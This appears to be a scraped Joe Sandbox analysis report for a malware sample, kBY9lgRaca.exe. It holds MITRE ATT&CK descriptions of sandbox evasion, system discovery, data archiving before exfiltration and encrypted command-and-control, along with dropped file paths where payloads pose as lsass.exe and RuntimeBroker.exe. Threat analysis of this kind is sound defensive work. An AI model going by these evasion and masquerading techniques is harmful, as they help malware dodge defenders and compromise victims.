Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report kBY9lgRaca.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Java\jre-1.8\bin\9e8d7a4ca61bd9

C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe

C:\Program Files (x86)\WindowsPowerShell\Modules\6203df4a6bafc7

C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe

C:\Program Files\Microsoft\OneDrive\ListSync\settings\07a615e8f2b317

C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe

C:\Program Files\Windows Portable Devices\07a615e8f2b317

C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe

C:\RuntimeDll\07a615e8f2b317

C:\RuntimeDll\PBs3ExWWgPs.vbe

C:\RuntimeDll\cef_process.exe

C:\RuntimeDll\er5JwegoF0epdZ7Hiy1grVzXqFtCRJ8c.bat

C:\RuntimeDll\mOBsSQwwQhAobhYfNDABCsnt.exe

Windows Analysis Report
kBY9lgRaca.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre